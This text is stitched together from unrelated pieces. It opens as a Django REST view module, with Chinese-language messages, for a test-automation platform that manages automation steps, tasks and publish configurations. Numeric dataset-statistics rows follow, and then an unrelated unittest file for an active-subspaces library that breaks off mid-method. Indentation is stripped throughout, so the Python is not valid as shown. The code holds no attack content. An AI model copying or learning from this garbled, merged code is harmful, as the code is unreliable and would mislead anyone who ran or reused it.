:param request:
:return:
"""
data = request.data
result = self.parameter_check(data)
data["user"] = request.user.pk
if result:
return result
with transaction.atomic():
try:
project=Project.objects.get(id=data["project_id"])
automation = Automation.objects.get(id=data["automation_id"])
step=AutomationStep.objects.create(name=data["name"],type=data["type"],steps=data["steps"],
params=data["params"],description=data["description"],
project=project,automation=automation)
Automation2Step.objects.create(order=data["order"],automation=automation,step=step)
except Exception:
logging.error(traceback.format_exc())
return JsonResponse(code="999996", msg="参数有误!")
return JsonResponse(data={"step_id": step.id},code="999999", msg="成功!")
class StepStatusUpdate(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
@permission_required("change_automation")
def post(self, request):
"""
修改用例步骤
:param request:
:return:
"""
data = request.data
with transaction.atomic():
try:
if data["type"] in ("case","reuse","data"):
AutomationList2Automation.objects.filter(id=data["id"]).update(status=data["status"])
else:
Automation2Step.objects.filter(id=data["id"]).update(status=data["status"])
return JsonResponse(code="999999", msg="成功!")
except:
logging.error(traceback.format_exc())
return JsonResponse(code="999998", msg="失败!")
class UpdateStep(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
def parameter_check(self, data):
"""
校验参数
:param data:
:return:
"""
try:
# 校验project_id, id类型为int
if not data["name"] or not data["type"] or not data["steps"] or not data["order"] or not data["id"] or not isinstance(data["id"], int):
return JsonResponse(code="999996", msg="参数有误!")
if not data["automation_id"] or not data["project_id"]:
return JsonResponse(code="999996", msg="参数有误!")
if data["type"] not in ["normal","project","global"]:
return JsonResponse(code="999996", msg="参数有误!")
except KeyError:
return JsonResponse(code="999996", msg="参数有误!")
@permission_required("change_automation")
def post(self, request):
"""
修改用例步骤
:param request:
:return:
"""
data = request.data
result = self.parameter_check(data)
if result:
return result
# try:
# step = AutomationStep.objects.get(id=data["id"])
# except ObjectDoesNotExist:
# return JsonResponse(code="999990", msg="步骤不存在!")
if data["type"]=="project":
name = AutomationStep.objects.filter(name=data["name"], project=data["project_id"],type="project").exclude(id=data["id"])
if len(name):
return JsonResponse(code="999997", msg="存在相同名称!")
if data["type"]=="global":
name = AutomationStep.objects.filter(name=data["name"], type="global").exclude(id=data["id"])
if len(name):
return JsonResponse(code="999997", msg="存在相同名称!")
with transaction.atomic():
try:
AutomationStep.objects.filter(id=data["id"]).update(name=data["name"],type=data["type"],steps=str(data["steps"]),
params=data["params"],description=data["description"])
return JsonResponse(code="999999", msg="成功!")
except:
logging.error(traceback.format_exc())
return JsonResponse(code="999998", msg="失败!")
class DelStep(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
def parameter_check(self, data):
"""
校验参数
:param data:
:return:
"""
try:
# 校验project_id, id类型为int
if not data["ids"] or not isinstance(data["ids"], list):
return JsonResponse(code="999996", msg="参数有误!")
except KeyError:
return JsonResponse(code="999996", msg="参数有误!")
@permission_required("change_automation")
def post(self, request):
"""
删除用例步骤
:param request:
:return:
"""
data = request.data
result = self.parameter_check(data)
if result:
return result
automation=Automation.objects.get(id=data["automation_id"])
for item in data["ids"]:
step=AutomationStep.objects.get(id=item["id"])
if step is not None:
# automation.steps.remove(step)
Automation2Step.objects.filter(automation=automation,step=step,order=item["order"]).delete()
if step.type=="normal":
step.delete()
steps=Automation2Step.objects.filter(automation=automation).order_by("order")
order=0
for step in steps:
order+=1
step.order=order
# step.update(order=order)
step.save()
return JsonResponse(code="999999", msg="成功!")
class AddReuseStep(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
@permission_required("change_automation")
def post(self, request):
"""
新增可重用用例步骤
:param request:
:return:
"""
data = request.data
if not data["automation_id"] or not data["project_id"]:
return JsonResponse(code="999996", msg="参数有误!")
with transaction.atomic():
try:
automation = Automation.objects.get(id=data["automation_id"])
order=len(automation.steps.all())
for id in data["ids"]:
order=order+1
step = AutomationStep.objects.get(id=id)
Automation2Step.objects.create(order=order,automation=automation,step=step)
except Exception:
logging.error(traceback.format_exc())
return JsonResponse(code="999996", msg="参数有误!")
return JsonResponse(code="999999", msg="成功!")
class LinkApi(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
@permission_required("change_automation")
def post(self, request):
"""
关联接口
:param request:
:return:
"""
data = request.data
if not data["automation_id"] or not data["project_id"]:
return JsonResponse(code="999996", msg="参数有误!")
with transaction.atomic():
try:
automation = Automation.objects.get(id=data["automation_id"])
for id in data["ids"]:
api = ApiInfo.objects.get(id=id)
automation.apis.add(api)
except Exception:
logging.error(traceback.format_exc())
return JsonResponse(code="999996", msg="参数有误!")
return JsonResponse(code="999999", msg="成功!")
class UnlinkApi(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
@permission_required("change_automation")
def post(self, request):
"""
取消关联接口
:param request:
:return:
"""
data = request.data
if not data["automation_id"] or not data["project_id"]:
return JsonResponse(code="999996", msg="参数有误!")
with transaction.atomic():
try:
automation = Automation.objects.get(id=data["automation_id"])
for id in data["ids"]:
api = ApiInfo.objects.get(id=id)
automation.apis.remove(api)
except Exception:
logging.error(traceback.format_exc())
return JsonResponse(code="999996", msg="参数有误!")
return JsonResponse(code="999999", msg="成功!")
class LinkAutomation(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
@permission_required("change_automation")
def post(self, request):
"""
关联用例
:param request:
:return:
"""
data = request.data
if not data["automation_id"] or not data["project_id"]:
return JsonResponse(code="999996", msg="参数有误!")
with transaction.atomic():
try:
automationParent = Automation.objects.get(id=data["automation_id"])
order=len(automationParent.automations.all())
for id in data["ids"]:
order=order+1
automationStep = Automation.objects.get(id=id)
AutomationList2Automation.objects.create(order=order,automationParent=automationParent,automationStep=automationStep)
except Exception:
logging.error(traceback.format_exc())
return JsonResponse(code="999996", msg="参数有误!")
return JsonResponse(code="999999", msg="成功!")
class UnlinkAutomation(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
@permission_required("change_automation")
def post(self, request):
"""
取消关联用例
:param request:
:return:
"""
data = request.data
if not data["automation_id"] or not data["project_id"]:
return JsonResponse(code="999996", msg="参数有误!")
with transaction.atomic():
try:
automationParent = Automation.objects.get(id=data["automation_id"])
# order=len(automationParent.automations.all())
for id in data["ids"]:
# order=order+1
automationStep = Automation.objects.get(id=id)
AutomationList2Automation.objects.filter(automationParent=automationParent,automationStep=automationStep).delete()
except Exception:
logging.error(traceback.format_exc())
return JsonResponse(code="999996", msg="参数有误!")
return JsonResponse(code="999999", msg="成功!")
class RunAutomation(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
def post(self, request):
"""
执行测试用例
:param request:
:return:
"""
data = request.data
try:
logging.info("Run automation with data: {data}".format(data=json.dumps(data)))
trace=datetime.now().strftime('%Y%m%d%H%M%S%f')
paramMap={}
envMap={}
ids=data["ids"] if "ids" in data else None
result={}
if "automation_id" in data:
automation = Automation.objects.get(id=data["automation_id"])
projectId=automation.project.id
if json.is_json(data["env"]):
envMap=json.loads(data["env"])
else:
env="集成" if data["env"]==1 else "预发布" if data["env"]==2 else "线上" if data["env"]==3 else data["env"]
obi = ProjectConfig.objects.filter(project=projectId,name=env,type="env").order_by("-id")
if len(obi)>0:
envMap=json.loads(obi[0].value)
context={"project":projectId,"ids":ids,"result":{},"details":[],"status":"RUNNING","trace":trace,"env":envMap["env"] if "env" in envMap else "","envMap":envMap,"user": request.user.pk if request.user.pk else 1}
context["debug"]=True
if "params" in data:
paramMap=json.loads(data["params"])
if "data" in data and len(data["data"])>0:
obis = ProjectConfig.objects.filter(project=projectId,name__in=data["data"],type="data")
for obi in obis:
paramMap=ParamUtil.replaceMap(paramMap,json.loads(obi.value))
context["value"]=paramMap
if automation.type=="list":
thread=RunService.run_automationlist(automation,context)
result=thread.result
else:
thread=RunService.run_automation(automation,context)
result=thread.result
record_dynamic(project=projectId,_type="执行", operationObject="自动化用例", user=request.user.pk,data="执行自动化用例[%s]" % automation.name)
elif "publish" in data:
env="集成" if data["env"]==1 else "预发布" if data["env"]==2 else "线上" if data["env"]==3 else data["env"]
publish = PublishConfig.objects.filter(name=data["publish"],env=env,status=True)
if len(publish)==0:
return JsonResponse(data={}, code="999990", msg="没有满足条件的发布项目配置!")
publish=publish[0]
projectId=publish.project.id
obi = ProjectConfig.objects.filter(project=projectId,name=env,type="env").order_by("-id")
if len(obi)>0:
envMap=json.loads(obi[0].value)
context={"project":projectId,"ids":ids,"result":{},"details":[],"status":"RUNNING","trace":trace,"env":envMap["env"] if "env" in envMap else "","envMap":envMap,"user": request.user.pk if request.user.pk else 1}
publishId=data["id"] if "id" in data else None
paramMap=json.loads(publish.params)
context["value"]=paramMap
result=PublishService.run_test(publish,publishId,context)
except Exception as e:
logging.error(traceback.format_exc())
return JsonResponse(code="999998", msg="执行失败! 异常信息: %s" % str(e))
return JsonResponse(data=result, code="999999", msg="成功!")
class ResultList(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
def get(self, request):
"""
获取用例执行结果
:param request:
:return:
"""
if request.GET.get("automation_id"):
automation_id = request.GET.get("automation_id")
trace=request.GET.get("trace")
if not automation_id.isdecimal():
return JsonResponse(code="999996", msg="参数有误!")
try:
automation=Automation.objects.get(id=automation_id)
except ObjectDoesNotExist:
return JsonResponse(code="999987", msg="自动化不存在!")
automation_result=RunService.getAutomationResult(automation,trace)
return JsonResponse(data=automation_result, code="999999", msg="成功!")
else:
trace=request.GET.get("trace")
automation_result=RunService.getPublishResult(trace)
return JsonResponse(data=automation_result, code="999999", msg="成功!")
class CommandList(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
def get(self, request):
"""
获取操作列表
:param request:
:return:
"""
commands=CommandService.get_all_commands()
project_id = request.GET.get("project_id")
automation_id = request.GET.get("automation_id")
if not project_id:
return JsonResponse(code="999996", msg="参数有误!")
try:
pro_data = Project.objects.get(id=project_id)
except ObjectDoesNotExist:
return JsonResponse(code="999995", msg="项目不存在!")
pro_data = ProjectSerializer(pro_data)
if not pro_data.data["status"]:
return JsonResponse(code="999985", msg="该项目已禁用")
apis = ApiInfo.objects.filter(project=project_id).order_by("-id")
for apiInfo in apis:
command={"name":apiInfo.name,"type":"api","desc":apiInfo.description,"alias":apiInfo.name,"value":apiInfo.params,"actionId":apiInfo.id}
commands.append(command)
automations = Automation.objects.filter(project=project_id,type="reuse").exclude(id=automation_id).order_by("-id")
for automation in automations:
command={"name":automation.name,"type":"automation","desc":automation.description,"alias":automation.name,"value":automation.params,"actionId":automation.id}
commands.append(command)
return JsonResponse(data={"data": commands}, code="999999", msg="成功!")
class TaskList(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
def get(self, request):
"""
获取自动化任务列表
:param request:
:return:
"""
try:
page_size = int(request.GET.get("page_size", 20))
page = int(request.GET.get("page", 1))
except (TypeError, ValueError):
return JsonResponse(code="999985", msg="page and page_size must be integer!")
project_id = request.GET.get("project_id")
automation_id = request.GET.get("automation_id")
name = request.GET.get("name")
if not project_id:
return JsonResponse(code="999996", msg="参数有误!")
if not project_id.isdecimal():
return JsonResponse(code="999996", msg="参数有误!")
try:
pro_data = Project.objects.get(id=project_id)
except ObjectDoesNotExist:
return JsonResponse(code="999995", msg="项目不存在!")
pro_data = ProjectSerializer(pro_data)
if not pro_data.data["status"]:
return JsonResponse(code="999985", msg="该项目已禁用")
if automation_id:
if name:
tasks=AutomationTask.objects.filter(project=project_id, automation=automation_id,name__contains=name).order_by("-id")
else:
tasks=AutomationTask.objects.filter(project=project_id, automation=automation_id).order_by("-id")
else:
if name:
tasks=AutomationTask.objects.filter(project=project_id, name__contains=name).order_by("-id")
else:
tasks=AutomationTask.objects.filter(project=project_id).order_by("-id")
paginator = Paginator(tasks, page_size) # paginator对象
pages = paginator.num_pages # 总页数
total = len(tasks)
try:
obm = paginator.page(page)
except PageNotAnInteger:
obm = paginator.page(1)
except EmptyPage:
obm = paginator.page(paginator.num_pages)
serialize = AutomationTaskSerializer(obm, many=True)
return JsonResponse(data={"data": serialize.data,
"page": page,
"pages": pages,
"total": total
}, code="999999", msg="成功!")
class AddTask(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
@permission_required("add_task")
def post(self, request):
"""
添加任务
:param request:
:return:
"""
data = request.data
data["user"] = request.user.pk
name = AutomationTask.objects.filter(name=data["name"], project=data["project_id"])
if len(name):
return JsonResponse(code="999997", msg="存在相同名称!")
else:
with transaction.atomic():
try:
serialize = AutomationTaskDeserializer(data=data)
if serialize.is_valid():
try:
project = Project.objects.get(id=data["project_id"])
serialize.save(project=project)
task=AutomationTask.objects.get(id=serialize.data.get("id"))
if data["status"]:
TaskService.start_task(task)
except Exception as e:
logging.exception(e)
traceback.print_exc()
return JsonResponse(code="999998", msg="失败!")
record_dynamic(project=data["project_id"],
_type="新增", operationObject="自动化任务", user=request.user.pk,
data="新增自动化任务\"%s\"" % data["name"])
return JsonResponse(data={"task_id": serialize.data.get("id")},
code="999999", msg="成功!")
return JsonResponse(code="999996", msg="参数有误!")
except:
logging.error(traceback.format_exc())
return JsonResponse(code="999998", msg="失败!")
class UpdateTask(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
@permission_required("change_task")
def post(self, request):
"""
修改自动化任务
:param request:
:return:
"""
data = request.data
if not data["project_id"] or not data["name"] or not data["id"]:
return JsonResponse(code="999996", msg="参数有误!")
if not isinstance(data["project_id"], int) or not isinstance(data["id"], int):
return JsonResponse(code="999996", msg="参数有误!")
try:
project = Project.objects.get(id=data["project_id"])
except ObjectDoesNotExist:
return JsonResponse(code="999995", msg="项目不存在!")
project = ProjectSerializer(project)
if not project.data["status"]:
return JsonResponse(code="999985", msg="该项目已禁用")
try:
task = AutomationTask.objects.get(id=data["id"])
except ObjectDoesNotExist:
return JsonResponse(code="999987", msg="自动化任务不存在!")
name = AutomationTask.objects.filter(name=data["name"], project=data["project_id"]).exclude(id=data["id"])
if len(name):
return JsonResponse(code="999997", msg="存在相同名称!")
else:
try:
serialize = AutomationTaskDeserializer(data=data)
if serialize.is_valid():
serialize.update(instance=task,validated_data=data)
# serialize.save()
if data["status"]:
TaskService.start_task(task)
else:
TaskService.stop_task(task)
return JsonResponse(code="999999", msg="成功!")
except:
logging.error(traceback.format_exc())
return JsonResponse(code="999998", msg="失败!")
class DelTask(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
@permission_required("delete_task")
def post(self, request):
"""
删除任务
:param request:
:return:
"""
data = request.data
if not data["project_id"] or not data["ids"]:
return JsonResponse(code="999996", msg="参数有误!")
if not isinstance(data["project_id"], int) or not isinstance(data["ids"], list):
return JsonResponse(code="999996", msg="参数有误!")
for i in data["ids"]:
if not isinstance(i, int):
return JsonResponse(code="999996", msg="参数有误!")
try:
project = Project.objects.get(id=data["project_id"])
except ObjectDoesNotExist:
return JsonResponse(code="999995", msg="项目不存在!")
project = ProjectSerializer(project)
if not project.data["status"]:
return JsonResponse(code="999985", msg="该项目已禁用")
for j in data["ids"]:
task = AutomationTask.objects.filter(id=j, project=data['project_id'])
if len(task) != 0:
name = task[0].name
TaskService.stop_task(task[0])
task.delete()
record_dynamic(project=data["project_id"],
_type="删除", operationObject="自动化任务", user=request.user.pk, data="删除自动化任务\"%s\"" % name)
return JsonResponse(code="999999", msg="成功!")
class StopTask(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
@permission_required("change_task")
def post(self, request):
"""
停止任务
:param request:
:return:
"""
data = request.data
# 查找项目是否存在
try:
task = AutomationTask.objects.get(id=data["id"])
task.status = False
task.save()
TaskService.stop_task(task)
record_dynamic(project=data["project_id"],
_type="禁用", operationObject="任务", user=request.user.pk, data=task.name)
return JsonResponse(code="999999", msg="成功")
except ObjectDoesNotExist:
return JsonResponse(code="999995", msg="任务不存在!")
class StartTask(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
@permission_required("change_task")
def post(self, request):
"""
启动任务
:param request:
:return:
"""
data = request.data
# 查找项目是否存在
try:
task = AutomationTask.objects.get(id=data["id"])
task.status = True
task.save()
TaskService.start_task(task)
record_dynamic(project=data["project_id"],
_type="启用", operationObject="任务", user=request.user.pk, data=task.name)
return JsonResponse(code="999999", msg="成功")
except ObjectDoesNotExist:
return JsonResponse(code="999995", msg="任务不存在!")
class RunTask(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
# @permission_required("run_task")
def post(self, request):
"""
执行任务
:param request:
:return:
"""
data = request.data
# 查找项目是否存在
try:
task = AutomationTask.objects.get(id=data["id"])
task.sendEmail=data["sendEmail"]
task.emails=data["emails"]
context={"project":task.project.id,"result":{},"details":[],"status":"RUNNING","user": request.user.pk if request.user.pk else 1}
TaskService.run_task(task,context)
record_dynamic(project=data["project_id"],
_type="执行", operationObject="任务", user=request.user.pk, data=task.name)
return JsonResponse(code="999999", msg="成功")
except:
logging.error(traceback.format_exc())
return JsonResponse(code="999995", msg="失败!")
class PublishConfigList(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
def get(self, request):
"""
获取发布项目配置列表
:param request:
:return:
"""
try:
page_size = int(request.GET.get("page_size", 20))
page = int(request.GET.get("page", 1))
except (TypeError, ValueError):
return JsonResponse(code="999985", msg="page and page_size must be integer!")
project_id = request.GET.get("project_id")
name = request.GET.get("name")
if not project_id:
return JsonResponse(code="999996", msg="参数有误!")
if not project_id.isdecimal():
return JsonResponse(code="999996", msg="参数有误!")
try:
pro_data = Project.objects.get(id=project_id)
except ObjectDoesNotExist:
return JsonResponse(code="999995", msg="项目不存在!")
pro_data = ProjectSerializer(pro_data)
if not pro_data.data["status"]:
return JsonResponse(code="999985", msg="该项目已禁用")
if name:
publishs=PublishConfig.objects.filter(project=project_id, name__contains=name).order_by("-id")
else:
publishs=PublishConfig.objects.filter(project=project_id).order_by("-id")
paginator = Paginator(publishs, page_size) # paginator对象
pages = paginator.num_pages # 总页数
total = len(publishs)
try:
obm = paginator.page(page)
except PageNotAnInteger:
obm = paginator.page(1)
except EmptyPage:
obm = paginator.page(paginator.num_pages)
serialize = PublishConfigSerializer(obm, many=True)
return JsonResponse(data={"data": serialize.data,
"page": page,
"pages": pages,
"total": total
}, code="999999", msg="成功!")
class AddPublishConfig(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
@permission_required("add_task")
def post(self, request):
"""
添加发布项目配置
:param request:
:return:
"""
data = request.data
data["user"] = request.user.pk
with transaction.atomic():
try:
serialize = PublishConfigDeserializer(data=data)
if serialize.is_valid():
project = Project.objects.get(id=data["project_id"])
serialize.save(project=project)
record_dynamic(project=data["project_id"],
_type="新增", operationObject="发布项目配置", user=request.user.pk,
data="新增发布项目配置:\"%s\",测试环境:\"%s\"" % (data["name"],data["env"]))
return JsonResponse(data={"id": serialize.data.get("id")},
code="999999", msg="成功!")
return JsonResponse(code="999996", msg="参数有误!")
except:
logging.error(traceback.format_exc())
return JsonResponse(code="999998", msg="失败!")
class UpdatePublishConfig(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
@permission_required("change_task")
def post(self, request):
"""
修改发布项目配置
:param request:
:return:
"""
data = request.data
if not data["project_id"] or not data["name"] or not data["id"]:
return JsonResponse(code="999996", msg="参数有误!")
if not isinstance(data["project_id"], int) or not isinstance(data["id"], int):
return JsonResponse(code="999996", msg="参数有误!")
try:
project = Project.objects.get(id=data["project_id"])
except ObjectDoesNotExist:
return JsonResponse(code="999995", msg="项目不存在!")
project = ProjectSerializer(project)
if not project.data["status"]:
return JsonResponse(code="999985", msg="该项目已禁用")
try:
publish = PublishConfig.objects.get(id=data["id"])
except ObjectDoesNotExist:
return JsonResponse(code="999987", msg="发布项目配置不存在!")
try:
serialize = PublishConfigDeserializer(data=data)
if serialize.is_valid():
serialize.update(instance=publish,validated_data=data)
# serialize.save()
return JsonResponse(code="999999", msg="成功!")
except:
logging.error(traceback.format_exc())
return JsonResponse(code="999998", msg="失败!")
class DelPublishConfig(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
@permission_required("delete_task")
def post(self, request):
"""
删除发布项目配置
:param request:
:return:
"""
data = request.data
if not data["project_id"] or not data["ids"]:
return JsonResponse(code="999996", msg="参数有误!")
if not isinstance(data["project_id"], int) or not isinstance(data["ids"], list):
return JsonResponse(code="999996", msg="参数有误!")
for i in data["ids"]:
if not isinstance(i, int):
return JsonResponse(code="999996", msg="参数有误!")
try:
project = Project.objects.get(id=data["project_id"])
except ObjectDoesNotExist:
return JsonResponse(code="999995", msg="项目不存在!")
project = ProjectSerializer(project)
if not project.data["status"]:
return JsonResponse(code="999985", msg="该项目已禁用")
try:
for j in data["ids"]:
publish = PublishConfig.objects.filter(id=j, project=data['project_id'])
if len(publish) != 0:
name = publish[0].name
env=publish[0].env
publish.delete()
record_dynamic(project=data["project_id"],
_type="删除", operationObject="发布项目配置", user=request.user.pk, data="删除发布项目配置:\"%s\",测试环境:\"%s\"" % (name,env))
return JsonResponse(code="999999", msg="成功!")
except:
logging.error(traceback.format_exc())
return JsonResponse(code="999998", msg="失败!")
class DisablePublishConfig(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
@permission_required("change_task")
def post(self, request):
"""
禁用发布项目配置
:param request:
:return:
"""
data = request.data
# 查找项目是否存在
try:
publish = PublishConfig.objects.get(id=data["id"])
publish.status = False
publish.save()
record_dynamic(project=data["project_id"],
_type="禁用", operationObject="发布项目配置", user=request.user.pk, data="禁用发布项目配置:\"%s\",测试环境:\"%s\"" % (publish.name,publish.env))
return JsonResponse(code="999999", msg="成功")
except ObjectDoesNotExist:
return JsonResponse(code="999995", msg="发布项目配置不存在!")
class EnablePublishConfig(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
@permission_required("change_task")
def post(self, request):
"""
启用发布项目配置
:param request:
:return:
"""
data = request.data
# 查找项目是否存在
try:
publish = PublishConfig.objects.get(id=data["id"])
publish.status = True
publish.save()
record_dynamic(project=data["project_id"],
_type="启用", operationObject="发布项目配置", user=request.user.pk, data="启用发布项目配置:\"%s\",测试环境:\"%s\"" % (publish.name,publish.env))
return JsonResponse(code="999999", msg="成功")
except ObjectDoesNotExist:
return JsonResponse(code="999995", msg="发布项目配置不存在!")
class RunPublishTest(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
# @permission_required("run_task")
def post(self, request):
"""
执行发布项目测试
:param request:
:return:
"""
data = request.data
# 查找项目是否存在
try:
publish = PublishConfig.objects.get(id=data["publish"])
publish.sendEmail=data["sendEmail"]
publish.emails=data["emails"]
trace=datetime.now().strftime('%Y%m%d%H%M%S%f')
paramMap=json.loads(publish.params)
env = ProjectConfig.objects.filter(project=publish.project.id,name=publish.env,type="env").order_by("-id")[0]
envMap=json.loads(env.value)
env=envMap["env"] if "env" in envMap else ""
context={"project":publish.project.id,"value":paramMap,"result":{},"details":[],"status":"RUNNING","trace":trace,"env":env,"envMap":envMap,"user": request.user.pk if request.user.pk else 1}
PublishService.run_test(publish,data["id"],context)
record_dynamic(project=data["project_id"],
_type="执行", operationObject="发布项目测试", user=request.user.pk, data="测试发布项目:\"%s\",测试环境:\"%s\",上线单ID:\"%s\"" % (publish.name,publish.env,data["id"]))
return JsonResponse(code="999999", msg="成功")
except:
logging.error(traceback.format_exc())
return JsonResponse(code="999995", msg="失败!")
| 41.636596
| 226
| 0.564891
| 6,457
| 65,078
| 5.597956
| 0.058541
| 0.090134
| 0.099817
| 0.05345
| 0.805456
| 0.77447
| 0.750678
| 0.715902
| 0.700409
| 0.648315
| 0
| 0.026127
| 0.308937
| 65,078
| 1,562
| 227
| 41.663252
| 0.7776
| 0.036034
| 0
| 0.721048
| 0
| 0
| 0.092464
| 0.001922
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040575
| false
| 0
| 0.017751
| 0
| 0.313609
| 0.000845
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1ee133f4c4210ab087a17860ea22203e4b5d378a
| 105
|
py
|
Python
|
models/triplet_learner.py
|
saiakhil0034/SimilarityLearning
|
0b649e8ab48c065b35b656e3cc63a9f98897d857
|
[
"MIT"
] | 1
|
2021-06-07T07:12:53.000Z
|
2021-06-07T07:12:53.000Z
|
models/triplet_learner.py
|
saiakhil0034/SimilarityLearning
|
0b649e8ab48c065b35b656e3cc63a9f98897d857
|
[
"MIT"
] | null | null | null |
models/triplet_learner.py
|
saiakhil0034/SimilarityLearning
|
0b649e8ab48c065b35b656e3cc63a9f98897d857
|
[
"MIT"
] | null | null | null |
import torch.nn as nn
import torch.nn.functional as F
from models.embedding_learner import EmbeddingNet
| 21
| 49
| 0.838095
| 17
| 105
| 5.117647
| 0.647059
| 0.252874
| 0.298851
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12381
| 105
| 4
| 50
| 26.25
| 0.945652
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
94b32fc273cd02c9a575c3a6513ff02a1911b29b
| 6,557
|
py
|
Python
|
tests/test_base.py
|
carlosal1015/active_subspaces
|
caaf108fcb89548a374fea7704b0d92d38b4539a
|
[
"MIT"
] | 1
|
2020-03-16T18:05:05.000Z
|
2020-03-16T18:05:05.000Z
|
tests/test_base.py
|
carlosal1015/active_subspaces
|
caaf108fcb89548a374fea7704b0d92d38b4539a
|
[
"MIT"
] | null | null | null |
tests/test_base.py
|
carlosal1015/active_subspaces
|
caaf108fcb89548a374fea7704b0d92d38b4539a
|
[
"MIT"
] | 1
|
2020-03-16T18:05:09.000Z
|
2020-03-16T18:05:09.000Z
|
from unittest import TestCase
import unittest
import active_subspaces.response_surfaces as asm
import active_subspaces.optimizers as aso
import active_subspaces.subspaces as ss
import active_subspaces.domains as dom
import active_subspaces.base as base
import helper
import numpy as np
class TestBase(TestCase):
def quad_fun(self, x):
A = np.array([[ 0.2406659045776698, -0.3159904335007421, -0.1746908591702878],
[-0.3159904335007421, 0.5532215729009683, 0.3777995408101305],
[-0.1746908591702878, 0.3777995408101305, 0.3161125225213613]])
x = x.reshape((3,1))
return 0.5*np.dot(x.T,np.dot(A,x))
def quad_dfun(self, x):
A = np.array([[ 0.2406659045776698, -0.3159904335007421, -0.1746908591702878],
[-0.3159904335007421, 0.5532215729009683, 0.3777995408101305],
[-0.1746908591702878, 0.3777995408101305, 0.3161125225213613]])
return np.dot(A,x.reshape((3,1)))
def test_rs_ubnd_int(self):
np.random.seed(42)
X = np.random.normal(size=(50,3))
f = np.zeros((50,1))
df = np.zeros((50,3))
for i in range(50):
x = X[i,:]
f[i,0] = self.quad_fun(x)
df[i,:] = self.quad_dfun(x).reshape((3, ))
model = base.ActiveSubspaceReducedModel(3, False)
model.build_from_data(X, f, df=df)
avg = model.average(20)[0]
prob, pl, pu = model.probability(0.0, 1.0)
fstar, xstar = model.minimum()
def test_rs_bnd_int(self):
np.random.seed(42)
X = np.random.uniform(-1.,1.,size=(50,3))
f = np.zeros((50,1))
df = np.zeros((50,3))
for i in range(50):
x = X[i,:]
f[i,0] = self.quad_fun(x)
df[i,:] = self.quad_dfun(x).reshape((3, ))
model = base.ActiveSubspaceReducedModel(3, True)
model.build_from_data(X, f, df=df)
avg = model.average(20)[0]
prob, pl, pu = model.probability(0.0, 1.0)
fstar, xstar = model.minimum()
def test_rs_ubnd_2d_int(self):
np.random.seed(42)
X = np.random.normal(size=(50,3))
f = np.zeros((50,1))
df = np.zeros((50,3))
for i in range(50):
x = X[i,:]
f[i,0] = self.quad_fun(x)
df[i,:] = self.quad_dfun(x).reshape((3, ))
model = base.ActiveSubspaceReducedModel(3, False)
model.build_from_data(X, f, df=df, avdim=2)
avg = model.average(20)[0]
prob, pl, pu = model.probability(0.0, 1.0)
fstar, xstar = model.minimum()
def test_rs_bnd_2d_int(self):
np.random.seed(42)
X = np.random.uniform(-1.,1.,size=(50,3))
f = np.zeros((50,1))
df = np.zeros((50,3))
for i in range(50):
x = X[i,:]
f[i,0] = self.quad_fun(x)
df[i,:] = self.quad_dfun(x).reshape((3, ))
model = base.ActiveSubspaceReducedModel(3, True)
model.build_from_data(X, f, df=df, avdim=2)
avg = model.average(20)[0]
prob, pl, pu = model.probability(0.0, 1.0)
fstar, xstar = model.minimum()
def test_rs_diag(self):
np.random.seed(42)
X = np.random.normal(size=(50,3))
f = np.zeros((50,1))
df = np.zeros((50,3))
for i in range(50):
x = X[i,:]
f[i,0] = self.quad_fun(x)
df[i,:] = self.quad_dfun(x).reshape((3, ))
model = base.ActiveSubspaceReducedModel(3, False)
model.build_from_data(X, f, df=df)
model.diagnostics()
def test_rs_predict(self):
np.random.seed(42)
X = np.random.normal(size=(50,3))
f = np.zeros((50,1))
df = np.zeros((50,3))
for i in range(50):
x = X[i,:]
f[i,0] = self.quad_fun(x)
df[i,:] = self.quad_dfun(x).reshape((3, ))
modelN = base.ActiveSubspaceReducedModel(3, False)
modelN.build_from_data(X, f, df=df)
XN = np.random.normal(size=X.shape)
modelN.predict(XN)
modelU = base.ActiveSubspaceReducedModel(3, True)
modelU.build_from_data(X, f, df=df)
XU = np.random.uniform(-1.0, 1.0, size=X.shape)
modelU.predict(XU)
def test_fun_rs_ubnd_int(self):
np.random.seed(42)
